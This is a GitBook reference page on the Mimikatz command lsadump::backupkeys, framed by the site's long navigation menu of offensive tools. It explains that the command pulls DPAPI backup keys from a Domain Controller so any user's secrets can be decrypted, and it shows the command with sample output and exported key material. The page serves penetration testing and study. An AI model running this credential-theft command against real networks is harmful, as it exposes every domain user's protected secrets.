The Hacker Tools
  • Introduction
  • Mimikatz 🥝
    • General 🛠️
    • Modules
      • crypto
        • capi
        • certificates
        • certtohw
        • cng
        • extract
        • hash
        • keys
        • kutil 🛠️
        • providers
        • sc
        • scauth 🛠️
        • stores
        • system
        • tpminfo
      • dpapi
        • blob
        • cache
        • capi
        • chrome
        • cloudapkd 🛠️
        • cloudapreg
        • cng
        • create 🛠️
        • cred
        • credhist
        • luna
        • masterkey
        • protect
        • ps
        • rdg
        • sccm
        • ssh
        • tpm
        • vault
        • wifi
        • wwan
      • event
        • clear
        • drop
      • kerberos
        • ask
        • clist
        • golden
        • hash
        • list
        • ptc
        • ptt
        • purge
        • tgt
      • lsadump
        • backupkeys
        • cache
        • changentlm
        • dcshadow
        • dcsync
        • mbc
        • netsync
        • lsa
        • packages
        • postzerologon
        • rpdata
        • sam
        • secrets
        • setntlm
        • trust
        • zerologon
      • misc
        • aadcookie
        • clip
        • compress
        • cmd
        • detours
        • easyntlmchall
        • efs
        • lock
        • memssp
        • mflt
        • ncroutemon
        • ngcsign
        • printnightmare
        • regedit
        • sccm
        • shadowcopies
        • skeleton
        • spooler
        • taskmgr
        • wp
        • xor
      • net
        • alias
        • deleg
        • group
        • if
        • serverinfo
        • session
        • share
        • stats
        • tod
        • trust
        • user
        • wsession
      • privilege
        • backup
        • debug
        • driver
        • id
        • name
        • restore
        • security
        • sysenv
        • tcb
      • process
        • exports
        • imports
        • list
        • resume
        • run
        • runp
        • start
        • stop
        • suspend
      • rpc
        • close
        • connect
        • enum
        • server
      • sekurlsa
        • backupkeys
        • bootkey
        • cloudap
        • credman
        • dpapi
        • dpapisystem
        • ekeys
        • kerberos
        • krbtgt
        • livessp
        • logonpasswords
        • minidump
        • msv
        • process
        • pth
        • ssp
        • tickets
        • trust
        • tspkg
        • wdigest
      • service
        • -
        • +
        • preshutdown
        • remove
        • resume
        • shutdown
        • start
        • stop
        • suspend
      • sid
        • add
        • clear
        • lookup
        • modify
        • patch
        • query
      • standard
        • answer
        • base64
        • cd
        • cls
        • coffee
        • exit
        • hostname
        • localtime
        • log
        • sleep
        • version
      • token
        • elevate
        • list
        • revert
        • run
        • whoami
      • ts
        • logonpasswords
        • mstsc
        • multirdp
        • remote
        • sessions
      • vault
        • cred
        • list
  • 🛠️Impacket
    • Library
      • SMB
      • LDAP
      • MSRPC
      • NTLM
      • Kerberos
    • Script examples
      • addcomputer.py
      • atexec.py
      • dcomexec.py
      • dpapi.py
      • esentutl.py
      • exchanger.py
      • findDelegation.py
      • GetADUsers.py
      • getArch.py
      • Get-GPPPassword.py
      • GetNPUsers.py
      • getPac.py
      • getST.py
      • getTGT.py
      • GetUserSPNs.py
      • goldenPac.py
      • karmaSMB.py
      • kintercept.py
      • lookupsid.py
      • mimikatz.py
      • mqtt_check.py
      • mssqlclient.py
      • mssqlinstance.py
      • netview.py
      • nmapAnswerMachine.py
      • ntfs-read.py
      • ntlmrelayx.py
      • ping.py
      • ping6.py
      • psexec.py
      • raiseChild.py
      • rdp_check.py
      • reg.py
      • registry-read.py
      • rpcdump.py
      • rpcmap.py
      • sambaPipe.py
      • samrdump.py
      • secretsdump.py
      • services.py
      • smbclient.py
      • smbexec.py
      • smbpasswd.py
      • smbrelayx.py
      • smbserver.py
      • sniff.py
      • sniffer.py
      • split.py
      • ticketConverter.py
      • ticketer.py
      • wmiexec.py
      • wmipersist.py
      • wmiquery.py
  • CrackMapExec
  • BloodHound
  • Rubeus
  • Exegol
  • PowerSploit
  • Hashcat
    • for Active Directory
    • Official docs
Powered by GitBook
On this page
  1. Mimikatz 🥝
  2. Modules
  3. lsadump

backupkeys

PreviouslsadumpNextcache

Last updated 3 years ago

lsadump::backupkeys dumps the DPAPI backup keys from the Domain Controller (cf. ). By holding the backup keys any user's master key can be decrypted and as a result the users' secrets can be decrypted. It has the following command line arguments:

  • /export: export the output as .pvk which means "private key"

  • /secret: at the time of writing, November 1st 2021, we don't know what this option refers to

  • /system: the target DC hostname

  • /guid: The szGuid value. It can be found at C:\Users\<username>\AppData\Roaming\Microsoft\Credentials, C:\Users\<username>\AppData\Local\Microsoft\Credentials and C:\Users\<username>\AppData\Roaming\Microsoft\Protect\SID. It can also be obtained with

This command requires elevated privileges (by previously running or by executing Mimikatz as the NT-AUTHORITY\SYSTEM account).

mimikatz # lsadump::backupkeys /export

Current prefered key:       {e3364acb-379c-4775-bef7-c3c1e1992589}
  * RSA key
        |Provider name : Microsoft Strong Cryptographic Provider
        |Unique name   :
        |Implementation: CRYPT_IMPL_SOFTWARE ;
        Algorithm      : CALG_RSA_KEYX
        Key size       : 2048 (0x00000800)
        Key permissions: 0000003f ( CRYPT_ENCRYPT ; CRYPT_DECRYPT ; CRYPT_EXPORT ; CRYPT_READ ; CRYPT_WRITE ; CRYPT_MAC ; )
        Exportable key : YES
        Private export : OK - 'ntds_capi_0_e3364acb-379c-4775-bef7-c3c1e1992589.keyx.rsa.pvk'
        PFX container  : OK - 'ntds_capi_0_e3364acb-379c-4775-bef7-c3c1e1992589.pfx'
        Export         : OK - 'ntds_capi_0_e3364acb-379c-4775-bef7-c3c1e1992589.der'

Compatibility prefered key: {b799ff33-a573-444f-bc86-b8aeb36fcb3f}
  * Legacy key
561acf46e03db74112af7412402415d80dfe92b0fbf57588358647007d46f28f
8f6ca1990c0fee951bd52e69e9bdfbf9c8e07be0033dff21a71d192447668096
f6e1199e5b8b61fb3ffb758a92757efe863307cefd7d773476053286c08dc7c6
87671f0e7374ccc179e6cf718673beb80dfe12bf03c7914a767a959b66478498
14527ee085f014c7574d9b9388dae00f42ee91f96e97c8272d6955e51e2d7304
67be8b32a706203bacf3abaca3d9f1ec90e4d63290e39d2e6c2465fc0e195b7a
2baadcb281537863a37c2e0f76d025ecb7a23b81970dbe2ab8e77b3b2fb617d7
bb7b81126e17a60d3023b0b8db159dd927f49136ce14f29565d3d9794d2f9c79

        Export         : OK - 'ntds_legacy_0_b799ff33-a573-444f-bc86-b8aeb36fcb3f.key'
dumping DPAPI secrets
sekurlsa::dpapi
privilege::debug